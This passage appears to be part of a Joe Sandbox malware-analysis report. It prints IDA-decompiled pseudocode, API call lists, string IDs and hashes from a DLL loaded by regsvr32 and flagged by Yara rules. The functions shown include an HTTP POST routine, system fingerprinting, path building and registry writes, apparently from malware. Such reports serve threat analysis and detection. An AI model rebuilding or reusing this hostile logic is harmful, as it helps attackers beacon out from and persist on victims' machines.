                                          								_t133 = 0x8484f700;
                                          								if(_v112 != 4) {
                                          									_t133 = _v12;
                                          								}
                                          								_t136 =  *0x1001e6a4; // 0x0
                                          								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                                          								_v8 = _t216;
                                          								if(_a24 != 0) {
                                          									E1000980C(_a24);
                                          								}
                                          								if(_t216 != 0) {
                                          									_t138 = 4;
                                          									if(_v112 != _t138) {
                                          										L19:
                                          										_t139 = E100095C7(0x777);
                                          										_t217 = _t139;
                                          										_v12 = _t217;
                                          										_t141 =  *0x1001e6a4; // 0x0
                                          										_t218 = _v8;
                                          										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
                                          										E100085C2( &_v12);
                                          										if(_a24 != 0) {
                                          											E1000980C(_a24);
                                          										}
                                          										if(_v28 != 0) {
                                          											L28:
                                          											_v24 = 8;
                                          											_push(0);
                                          											_v32 = 0;
                                          											_v28 = 0;
                                          											_push( &_v24);
                                          											_push( &_v32);
                                          											_t147 =  *0x1001e6a4; // 0x0
                                          											_push(0x13);
                                          											_push(_t218);
                                          											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                                          												_t219 = E10009749( &_v32);
                                          												if(_t219 == 0xc8) {
                                          													 *_a20 = _v8;
                                          													 *_a12 = _t213;
                                          													 *_a16 = _t186;
                                          													return 0;
                                          												}
                                          												_t220 =  ~_t219;
                                          												L32:
                                          												_t154 =  *0x1001e6a4; // 0x0
                                          												 *((intOrPtr*)(_t154 + 8))(_v8);
                                          												L33:
                                          												if(_t186 != 0) {
                                          													_t158 =  *0x1001e6a4; // 0x0
                                          													 *((intOrPtr*)(_t158 + 8))(_t186);
                                          												}
                                          												if(_t213 != 0) {
                                          													_t203 =  *0x1001e6a4; // 0x0
                                          													 *((intOrPtr*)(_t203 + 8))(_t213);
                                          												}
                                          												return _t220;
                                          											}
                                          											GetLastError();
                                          											_t220 = 0xfffffff8;
                                          											goto L32;
                                          										} else {
                                          											GetLastError();
                                          											_t162 =  *0x1001e6a4; // 0x0
                                          											 *((intOrPtr*)(_t162 + 8))(_t218);
                                          											_t218 = 0;
                                          											goto L23;
                                          										}
                                          									}
                                          									_v12 = _t138;
                                          									_push( &_v12);
                                          									_push( &_v16);
                                          									_t172 =  *0x1001e6a4; // 0x0
                                          									_push(0x1f);
                                          									_push(_t216);
                                          									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                                          										L18:
                                          										GetLastError();
                                          										goto L19;
                                          									}
                                          									_v16 = _v16 | 0x00003380;
                                          									_push(4);
                                          									_push( &_v16);
                                          									_t176 =  *0x1001e6a4; // 0x0
                                          									_push(0x1f);
                                          									_push(_t216);
                                          									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                                          										goto L19;
                                          									}
                                          									goto L18;
                                          								} else {
                                          									GetLastError();
                                          									L23:
                                          									_t164 =  *0x1001e6a4; // 0x0
                                          									 *((intOrPtr*)(_t164 + 8))(_t186);
                                          									_t186 = 0;
                                          									goto L24;
                                          								}
                                          							} else {
                                          								GetLastError();
                                          								L24:
                                          								_t166 =  *0x1001e6a4; // 0x0
                                          								 *((intOrPtr*)(_t166 + 8))(_t213);
                                          								_t213 = 0;
                                          								goto L25;
                                          							}
                                          						}
                                          						GetLastError();
                                          						L25:
                                          						_t204 = _t218;
                                          						_t209 = _v20 + 1;
                                          						_v20 = _t209;
                                          					} while (_t209 < 2);
                                          					_v8 = _t218;
                                          					if(_t204 != 0) {
                                          						goto L28;
                                          					}
                                          					_t220 = 0xfffffffe;
                                          					goto L33;
                                          				}
                                          				_t183 = 0xfffffffc;
                                          				return _t183;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Similarity
                                          • API ID: memset$ErrorLast
                                          • String ID: POST
                                          • API String ID: 2570506013-1814004025
                                          • Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                                          • Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
                                          • Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                                          • Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
                                          Uniqueness
                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E100116B8(signed int* _a4) {
                                          				char _v8;
                                          				_Unknown_base(*)()* _v12;
                                          				_Unknown_base(*)()* _v16;
                                          				char _v20;
                                          				_Unknown_base(*)()* _t16;
                                          				_Unknown_base(*)()* _t17;
                                          				void* _t22;
                                          				intOrPtr* _t28;
                                          				signed int _t29;
                                          				signed int _t30;
                                          				struct HINSTANCE__* _t32;
                                          				void* _t34;
                                          
                                          				_t30 = 0;
                                          				_v8 = 0;
                                          				_t32 = GetModuleHandleA("advapi32.dll");
                                          				if(_t32 == 0) {
                                          					L9:
                                          					return 1;
                                          				}
                                          				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                                          				_v12 = _t16;
                                          				if(_t16 == 0) {
                                          					goto L9;
                                          				}
                                          				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                                          				_v16 = _t17;
                                          				if(_t17 == 0) {
                                          					goto L9;
                                          				}
                                          				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                                          				if(_t28 == 0) {
                                          					goto L9;
                                          				}
                                          				_push(0xf0000000);
                                          				_push(1);
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v8);
                                          				if(_v12() == 0) {
                                          					goto L9;
                                          				}
                                          				_t22 = _v16(_v8, 4,  &_v20);
                                          				 *_t28(_v8, 0);
                                          				if(_t22 == 0) {
                                          					goto L9;
                                          				}
                                          				_t29 = 0;
                                          				do {
                                          					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                                          					_t29 = _t29 + 1;
                                          				} while (_t29 < 4);
                                          				 *_a4 = _t30;
                                          				return 0;
                                          			}

                                          APIs
                                          • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
                                          • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
                                          • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                          • API String ID: 667068680-129414566
                                          • Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                                          • Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
                                          • Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                                          • Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764
                                          Uniqueness
                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                          				signed int _t12;
                                          				signed int _t13;
                                          				int _t15;
                                          				char* _t24;
                                          				char* _t26;
                                          				char* _t28;
                                          				char* _t29;
                                          				signed int _t40;
                                          				char* _t43;
                                          				char* _t45;
                                          				long long* _t47;
                                          
                                          				_t12 = _a20;
                                          				if(_t12 == 0) {
                                          					_t12 = 0x11;
                                          				}
                                          				_t26 = _a4;
                                          				_push(_t30);
                                          				 *_t47 = _a12;
                                          				_push(_t12);
                                          				_push("%.*g");
                                          				_push(_a8);
                                          				_push(_t26);
                                          				L10012285();
                                          				_t40 = _t12;
                                          				if(_t40 < 0 || _t40 >= _a8) {
                                          					L19:
                                          					_t13 = _t12 | 0xffffffff;
                                          					goto L20;
                                          				} else {
                                          					L100122CD();
                                          					_t15 =  *((intOrPtr*)( *_t12));
                                          					if(_t15 != 0x2e) {
                                          						_t24 = strchr(_t26, _t15);
                                          						if(_t24 != 0) {
                                          							 *_t24 = 0x2e;
                                          						}
                                          					}
                                          					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                                          						L11:
                                          						_t43 = strchr(_t26, 0x65);
                                          						_t28 = _t43;
                                          						if(_t43 == 0) {
                                          							L18:
                                          							_t13 = _t40;
                                          							L20:
                                          							return _t13;
                                          						}
                                          						_t45 = _t43 + 1;
                                          						_t29 = _t28 + 2;
                                          						if( *_t45 == 0x2d) {
                                          							_t45 = _t29;
                                          						}
                                          						while( *_t29 == 0x30) {
                                          							_t29 = _t29 + 1;
                                          						}
                                          						if(_t29 != _t45) {
                                          							E10008706(_t45, _t29, _t40 - _t29 + _a4);
                                          							_t40 = _t40 + _t45 - _t29;
                                          						}
                                          						goto L18;
                                          					} else {
                                          						_t6 = _t40 + 3; // 0x100109b2
                                          						_t12 = _t6;
                                          						if(_t12 >= _a8) {
                                          							goto L19;
                                          						}
                                          						_t26[_t40] = 0x302e;
                                          						( &(_t26[2]))[_t40] = 0;
                                          						_t40 = _t40 + 2;
                                          						goto L11;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strchr$_snprintflocaleconv
                                          • String ID: %.*g
                                          • API String ID: 1910550357-952554281
                                          • Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                                          • Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
                                          • Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                                          • Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _snprintfqsort
                                          • String ID: %I64d$false$null$true
                                          • API String ID: 756996078-4285102228
                                          • Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                                          • Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
                                          • Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                                          • Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                          				char _v516;
                                          				void _v1044;
                                          				char _v1076;
                                          				signed int _v1080;
                                          				signed int _v1096;
                                          				WCHAR* _v1100;
                                          				intOrPtr _v1104;
                                          				signed int _v1108;
                                          				intOrPtr _v1112;
                                          				intOrPtr _v1116;
                                          				char _v1144;
                                          				char _v1148;
                                          				void* __esi;
                                          				intOrPtr _t66;
                                          				intOrPtr _t73;
                                          				signed int _t75;
                                          				intOrPtr _t76;
                                          				signed int _t81;
                                          				WCHAR* _t87;
                                          				void* _t89;
                                          				signed int _t90;
                                          				signed int _t91;
                                          				signed int _t93;
                                          				signed int _t94;
                                          				WCHAR* _t96;
                                          				intOrPtr _t106;
                                          				intOrPtr _t107;
                                          				void* _t108;
                                          				intOrPtr _t109;
                                          				signed char _t116;
                                          				WCHAR* _t118;
                                          				void* _t122;
                                          				signed int _t123;
                                          				intOrPtr _t125;
                                          				void* _t128;
                                          				void* _t129;
                                          				WCHAR* _t130;
                                          				void* _t134;
                                          				void* _t141;
                                          				void* _t143;
                                          				WCHAR* _t145;
                                          				signed int _t153;
                                          				void* _t154;
                                          				void* _t178;
                                          				signed int _t180;
                                          				void* _t181;
                                          				void* _t183;
                                          				void* _t187;
                                          				signed int _t188;
                                          				WCHAR* _t190;
                                          				signed int _t191;
                                          				signed int _t192;
                                          				intOrPtr* _t194;
                                          				signed int _t196;
                                          				void* _t199;
                                          				void* _t200;
                                          				void* _t201;
                                          				void* _t202;
                                          				intOrPtr* _t203;
                                          				void* _t208;
                                          
                                          				_t208 = __fp0;
                                          				_push(_t191);
                                          				_t128 = __edx;
                                          				_t187 = __ecx;
                                          				_t192 = _t191 | 0xffffffff;
                                          				memset( &_v1044, 0, 0x20c);
                                          				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                                          				_v1108 = 1;
                                          				if(_t187 != 0) {
                                          					_t123 =  *0x1001e688; // 0x2de0590
                                          					_t125 =  *0x1001e68c; // 0x2e5fc68
                                          					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                                          				}
                                          				if(E1000BB8D(_t187) != 0) {
                                          					L4:
                                          					_t134 = _t128;
                                          					_t66 = E1000B7A8(_t134,  &_v516);
                                          					_push(_t134);
                                          					_v1104 = _t66;
                                          					E1000B67D(_t66,  &_v1076, _t206, _t208);
                                          					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
                                          					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
                                          					E1000B88A(_t141,  &_v1100, _t208);
                                          					_t175 =  &_v1076;
                                          					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
                                          					_v1112 = _t73;
                                          					_t143 = _t141;
                                          					if(_t73 != 0) {
                                          						_push(0);
                                          						_push(_t129);
                                          						_push("\\");
                                          						_t130 = E100092E5(_t73);
                                          						_t200 = _t199 + 0x10;
                                          						_t75 =  *0x1001e688; // 0x2de0590
                                          						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                                          						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                                          							L12:
                                          							__eflags = _v1108;
                                          							if(__eflags != 0) {
                                          								_t76 = E100091E3(_v1112);
                                          								_t145 = _t130;
                                          								 *0x1001e740 = _t76;
                                          								 *0x1001e738 = E100091E3(_t145);
                                          								L17:
                                          								_push(_t145);
                                          								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
                                          								_t201 = _t200 + 0x10;
                                          								__eflags = _t188;
                                          								if(_t188 == 0) {
                                          									goto L41;
                                          								}
                                          								_push(0x1001b9ca);
                                          								E10009F48(0xe);
                                          								E10009F6C(_t188, _t208, _t130);
                                          								_t194 = _a4;
                                          								_v1096 = _v1096 & 0x00000000;
                                          								_push(2);
                                          								_v1100 =  *_t194;
                                          								_push(8);
                                          								_push( &_v1100);
                                          								_t178 = 0xb;
                                          								E1000A0AB(_t188, _t178, _t208);
                                          								_t179 =  *(_t194 + 0x10);
                                          								_t202 = _t201 + 0xc;
                                          								__eflags =  *(_t194 + 0x10);
                                          								if( *(_t194 + 0x10) != 0) {
                                          									E1000A3ED(_t188, _t179, _t208);
                                          								}
                                          								_t180 =  *(_t194 + 0xc);
                                          								__eflags = _t180;
                                          								if(_t180 != 0) {
                                          									E1000A3ED(_t188, _t180, _t208);
                                          								}
                                          								_t87 = E1000980C(0);
                                          								_push(2);
                                          								_v1100 = _t87;
                                          								_t153 = _t188;
                                          								_push(8);
                                          								_v1096 = _t180;
                                          								_push( &_v1100);
                                          								_t181 = 2;
                                          								_t89 = E1000A0AB(_t153, _t181, _t208);
                                          								_t203 = _t202 + 0xc;
                                          								__eflags = _v1108;
                                          								if(_v1108 == 0) {
                                          									_t153 =  *0x1001e688; // 0x2de0590
                                          									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                                          									if(__eflags != 0) {
                                          										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
                                          										_t203 = _t203 + 0xc;
                                          										goto L26;
                                          									}
                                          									_t153 = _t153 + 0x228;
                                          									goto L25;
                                          								} else {
                                          									_t91 =  *0x1001e688; // 0x2de0590
                                          									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                                          									if(__eflags != 0) {
                                          										L32:
                                          										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                                          										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                                          											_t183 = 0x64;
                                          											E1000E23E(_t183);
                                          										}
                                          										E100052C0( &_v1076, _t208);
                                          										_t190 = _a8;
                                          										_t154 = _t153;
                                          										__eflags = _t190;
                                          										if(_t190 != 0) {
                                          											_t94 =  *0x1001e688; // 0x2de0590
                                          											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                                          											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                                          												lstrcpyW(_t190, _t130);
                                          											} else {
                                          												_t96 = E1000109A(_t154, 0x228);
                                          												_v1100 = _t96;
                                          												lstrcpyW(_t190, _t96);
                                          												E100085D5( &_v1100);
                                          												 *_t203 = "\"";
                                          												lstrcatW(_t190, ??);
                                          												lstrcatW(_t190, _t130);
                                          												lstrcatW(_t190, "\"");
                                          											}
                                          										}
                                          										_t93 = _a12;
                                          										__eflags = _t93;
                                          										if(_t93 != 0) {
                                          											 *_t93 = _v1104;
                                          										}
                                          										_t192 = 0;
                                          										__eflags = 0;
                                          										goto L41;
                                          									}
                                          									_t51 = _t91 + 0x228; // 0x2de07b8
                                          									_t153 = _t51;
                                          									L25:
                                          									_t90 = E1000553F(_t153, _t130, __eflags);
                                          									L26:
                                          									__eflags = _t90;
                                          									if(_t90 >= 0) {
                                          										_t91 =  *0x1001e688; // 0x2de0590
                                          										goto L32;
                                          									}
                                          									_push(0xfffffffd);
                                          									L6:
                                          									_pop(_t192);
                                          									goto L41;
                                          								}
                                          							}
                                          							_t106 = E1000C292(_v1104, __eflags);
                                          							_v1112 = _t106;
                                          							_t107 =  *0x1001e684; // 0x2e5faa0
                                          							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                          							__eflags = _t108 - _t192;
                                          							if(_t108 != _t192) {
                                          								_t109 =  *0x1001e684; // 0x2e5faa0
                                          								 *((intOrPtr*)(_t109 + 0x30))();
                                          								E1000861A( &_v1148, _t192);
                                          								_t145 = _t108;
                                          								goto L17;
                                          							}
                                          							E1000861A( &_v1144, _t192);
                                          							_t81 = 1;
                                          							goto L42;
                                          						}
                                          						_t116 =  *(_t75 + 0x1898);
                                          						__eflags = _t116 & 0x00000004;
                                          						if((_t116 & 0x00000004) == 0) {
                                          							__eflags = _t116;
                                          							if(_t116 != 0) {
                                          								goto L12;
                                          							}
                                          							L11:
                                          							E1000E286(_v1112, _t175);
                                          							goto L12;
                                          						}
                                          						_v1080 = _v1080 & 0x00000000;
                                          						_t118 = E100095E1(_t143, 0x879);
                                          						_v1100 = _t118;
                                          						_t175 = _t118;
                                          						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                                          						E100085D5( &_v1100);
                                          						_t200 = _t200 + 0x14;
                                          						goto L11;
                                          					}
                                          					_push(0xfffffffe);
                                          					goto L6;
                                          				} else {
                                          					_t122 = E10002BA4( &_v1044, _t192, 0x105);
                                          					_t206 = _t122;
                                          					if(_t122 == 0) {
                                          						L41:
                                          						_t81 = _t192;
                                          						L42:
                                          						return _t81;
                                          					}
                                          					goto L4;
                                          				}
                                          			}
                                          0x10004b13
                                          0x10004b51
                                          0x10004b53
                                          0x00000000
                                          0x00000000
                                          0x10004b55
                                          0x10004b59
                                          0x00000000
                                          0x10004b59
                                          0x10004b15
                                          0x10004b1f
                                          0x10004b2b
                                          0x10004b36
                                          0x10004b3d
                                          0x10004b47
                                          0x10004b4c
                                          0x00000000
                                          0x10004b4c
                                          0x10004ae2
                                          0x00000000
                                          0x10004a66
                                          0x10004a71
                                          0x10004a77
                                          0x10004a79
                                          0x10004d64
                                          0x10004d64
                                          0x10004d66
                                          0x10004d6c
                                          0x10004d6c
                                          0x00000000
                                          0x10004a79

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$memset
                                          • String ID:
                                          • API String ID: 1985475764-0
                                          • Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                                          • Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
                                          • Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                                          • Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 1000D75C
                                          • SysAllocString.OLEAUT32(?), ref: 1000D764
                                          • SysAllocString.OLEAUT32(00000000), ref: 1000D778
                                          • SysFreeString.OLEAUT32(?), ref: 1000D7F3
                                          • SysFreeString.OLEAUT32(?), ref: 1000D7F6
                                          • SysFreeString.OLEAUT32(?), ref: 1000D7FB
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                                          • Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
                                          • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                                          • Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: @$\u%04X$\u%04X\u%04X
                                          • API String ID: 0-2132903582
                                          • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                                          • Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
                                          • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                                          • Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E100121FF(char* __eax, char** _a4, long long* _a8) {
                                          				char* _v8;
                                          				long long _v16;
                                          				char* _t9;
                                          				signed char _t11;
                                          				char** _t19;
                                          				char _t22;
                                          				long long _t32;
                                          				long long _t33;
                                          
                                          				_t9 = __eax;
                                          				L100122CD();
                                          				_t19 = _a4;
                                          				_t22 =  *__eax;
                                          				if( *_t22 != 0x2e) {
                                          					_t9 = strchr( *_t19, 0x2e);
                                          					if(_t9 != 0) {
                                          						 *_t9 =  *_t22;
                                          					}
                                          				}
                                          				L10012291();
                                          				 *_t9 =  *_t9 & 0x00000000;
                                          				_t11 = strtod( *_t19,  &_v8);
                                          				asm("fst qword [ebp-0xc]");
                                          				_t32 =  *0x10018250;
                                          				asm("fucomp st1");
                                          				asm("fnstsw ax");
                                          				if((_t11 & 0x00000044) != 0) {
                                          					L5:
                                          					st0 = _t32;
                                          					L10012291();
                                          					if( *_t11 != 0x22) {
                                          						_t33 = _v16;
                                          						goto L8;
                                          					} else {
                                          						return _t11 | 0xffffffff;
                                          					}
                                          				} else {
                                          					_t33 =  *0x10018258;
                                          					asm("fucomp st1");
                                          					asm("fnstsw ax");
                                          					if((_t11 & 0x00000044) != 0) {
                                          						L8:
                                          						 *_a8 = _t33;
                                          						return 0;
                                          					} else {
                                          						goto L5;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _errno$localeconvstrchrstrtod
                                          • String ID:
                                          • API String ID: 1035490122-0
                                          • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                                          • Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
                                          • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                                          • Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E1000CF84(void* __ecx) {
                                          				intOrPtr _t11;
                                          				long _t12;
                                          				intOrPtr _t17;
                                          				intOrPtr _t18;
                                          				struct _OSVERSIONINFOA* _t29;
                                          
                                          				_push(__ecx);
                                          				_t29 =  *0x1001e688; // 0x2de0590
                                          				GetCurrentProcess();
                                          				_t11 = E1000BA05();
                                          				_t1 = _t29 + 0x1644; // 0x2de1bd4
                                          				_t25 = _t1;
                                          				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                                          				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                                          				_t33 = _t12;
                                          				if(_t12 != 0) {
                                          					_t12 = E10008FBE(_t25, _t33);
                                          				}
                                          				_t3 = _t29 + 0x228; // 0x2de07b8
                                          				 *(_t29 + 0x1854) = _t12;
                                          				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
                                          				memset(_t29, 0, 0x9c);
                                          				_t29->dwOSVersionInfoSize = 0x9c;
                                          				GetVersionExA(_t29);
                                          				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                                          				_t17 = E1000E3B6(_t3);
                                          				_t7 = _t29 + 0x220; // 0x2de07b0
                                          				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                                          				_t18 = E1000E3F1(_t7);
                                          				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                                          				return _t18;
                                          			}

                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,02DE0590,?,10003545), ref: 1000CF90
                                          • GetModuleFileNameW.KERNEL32(00000000,02DE1BD4,00000105,?,?,02DE0590,?,10003545), ref: 1000CFB1
                                          • memset.MSVCRT ref: 1000CFE2
                                          • GetVersionExA.KERNEL32(02DE0590,02DE0590,?,10003545), ref: 1000CFED
                                          • GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProcess$FileModuleNameVersionmemset
                                          • String ID:
                                          • API String ID: 3581039275-0
                                          • Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                                          • Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
